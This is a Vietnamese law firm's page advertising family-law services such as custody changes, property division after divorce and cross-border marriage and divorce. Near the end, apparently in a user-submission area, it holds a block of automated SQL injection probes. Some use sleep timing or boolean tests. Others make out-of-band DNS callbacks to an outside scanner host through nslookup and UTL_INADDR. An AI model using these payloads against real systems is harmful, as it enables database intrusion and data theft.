Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tư vấn pháp luật về Dân sự, Hôn nhân và gia đình

Cập nhật lần cuối lúc 17:09 ngày 27/05/2013

  • Trả lời (50)
  • Chuyên gia trả lời

Thay đổi quyền nuôi con - chia tài sản sau ly hôn

Sau khi ly hôn bằng bản án của tòa có thể là ly hôn đơn phương hoặc thuận tình ly hôn vấn đề tranh chấp vẫn có thể phát sinh sau đó, đó có thể là tranh chấp thay đổi quyền nuôi con hoặc tranh chấp phân chia tài sản chung có trong thời kỳ hôn nhân.

Nội dung tư vấn:                   

- Tư vấn luật, soạn thảo đơn yêu cầu thay đổi quyền nuôi con hoặc phân chia tài sản chung vợ chồng.

- Đại diện thay mặt làm việc với các cơ quan, người có thẩm quyền để thu thập chứng cứ, tài liệu trong yêu cầu thay đổi quyền nuôi con và tài sản chung.

- Dịch vụ luật sư tranh tụng trước tòa trong việc yêu cầu thay đổi quyền nuôi con và phân chia tài sản chung.

- Đại diện ngoài tố tụng, tư vấn luật theo yêu cầu...

- Tìm kiếm, xác minh thông tin về hôn nhân và gia đình theo yêu cầu.

 

Tư vấn Ly hôn

 

- Luật sư tranh tụng bảo vệ quyền lợi hợp pháp trong phiên tòa xử ly hôn.

- Tư vấn luật về quyền nuôi con và thay đổi quyền nuôi con.

- Tư vấn luật, thực hiện dịch vụ về việc phân chia tài sản khi ly hôn.

- Luật sư tư vấn thủ tục đơn phương xin ly hôn.

- Luật sư tư vấn thủ tục thuận tình ly hôn.

- Tư vấn luật, luật sư tranh tụng yêu cầu chia tài sản sau ly hôn.

- Tư vấn luật ly hôn có yếu tố nước ngoài (trường hợp vợ hoặc chồng hay cả hai đang ở nước ngoài).

- Tư vấn phân chia tài sản khi ly hôn có yếu tố nước ngoài (tài sản ở trong nước nhưng vợ hay chồng ở nước khác hoặc tài sản ở nước ngoài). 

- Tư vấn thủ tục xác nhận, xác minh tài sản riêng của vợ, chồng.

- Tư vấn thủ tục xin nhận con nuôi, xác nhận con ngoài giá thú, nhận cha mẹ cho con.


Ly hôn có yếu tố nước ngoài

Dịch vụ tư vấn:

- Tư vấn luật các quy định của luật về trình tự, thủ tục khi ly hôn.

- Soạn thảo đơn, tư vấn chuẩn bị hồ sơ và giấy tờ tài liệu khi ly hôn.

- Dịch vụ luật sư tranh tụng tại tòa bảo vệ quyền lợi khi ly hôn. 

- Yêu cầu thay đổi quyền nuôi con, chia tài sản chung vợ chồng sau ly hôn.

- Đại diện ngoài tố tụng, tư vấn và thực hiện dịch vụ pháp lý khác                                                                         

 

Phân chia tài sản chung vợ chồng

- Tư vấn luật về sáp nhập hoặc chia tài sản chung trong thời kỳ hôn nhân.

- Tư vấn luật, bảo vệ quyền lợi trước tòa yêu cầu chia tài sản chung vợ chồng.

- Tham gia đàm phán, phân chia tài sản chung vợ chồng.

- Tư vấn luật, soạn đơn, dịch vụ luật sư bảo vệ trước tòa yêu cầu chia tài sản chung vợ chồng sau ly hôn.

- Đại diện theo ủy quyền trước tòa, thực hiện dịch vụ ngoài tố tụng theo yêu cầu.                                                  

 

Tư vấn Kết hôn có yếu tố nước ngoài

- Tư vấn thủ tục, trình tự và hồ sơ đăng ký kết hôn trong nước hoặc có yếu tố nước ngoài.

- Thực hiện dịch vụ đăng ký Kết hôn có yếu tố nước ngoài hoặc kết hôn tại nước ngoài.

- Xin cấp lại, trích sao Bản chính giấy đăng ký kết hôn bị mất, rách…

- Tư vấn việc hợp nhất tài sản trong khi kết hôn.

- Tư vân việc phân chia tài sản trong khi kết hôn.                                                                                              


1
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3715.34060.d27a3.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-3718.34060.d27a3.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-3719.34060.d27a3.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-3721.34060.d27a3.\1.bxss.me
383'
u98DfHWU');select pg_sleep(9); --
1
1
-1 OR 2+876-876-1=0+0+0+1 --
-1 OR 3+876-876-1=0+0+0+1 --
1'"
-1 OR 3*2<(0+5+876-876) --
-1 OR 3*2>(0+5+876-876) --
\
1
-1 OR 2+294-294-1=0+0+0+1
@@IvZtm
-1 OR 3+294-294-1=0+0+0+1
JyI=
-1 OR 3*2<(0+5+294-294)
-1 OR 3*2>(0+5+294-294)
-1' OR 2+460-460-1=0+0+0+1 --
-1' OR 3+460-460-1=0+0+0+1 --
-1' OR 3*2<(0+5+460-460) --
-1' OR 3*2>(0+5+460-460) --
-1' OR 2+604-604-1=0+0+0+1 or 'ZbErjNdR'='
-1' OR 3+604-604-1=0+0+0+1 or 'ZbErjNdR'='
-1' OR 3*2<(0+5+604-604) or 'ZbErjNdR'='
-1' OR 3*2>(0+5+604-604) or 'ZbErjNdR'='
-1" OR 2+908-908-1=0+0+0+1 --
-1" OR 3+908-908-1=0+0+0+1 --
-1" OR 3*2<(0+5+908-908) --
-1" OR 3*2>(0+5+908-908) --
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:6' --
1 waitfor delay '0:0:9' --
E5Xymj8S'; waitfor delay '0:0:6' --
-1;select pg_sleep(6); --
-1);select pg_sleep(9); --
-1));select pg_sleep(9); --
BFp1RSAy';select pg_sleep(9); --
YgP82sPe');select pg_sleep(3); --
1
vPjzyJA5'));select pg_sleep(6); --

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề:
Bài viết liên quan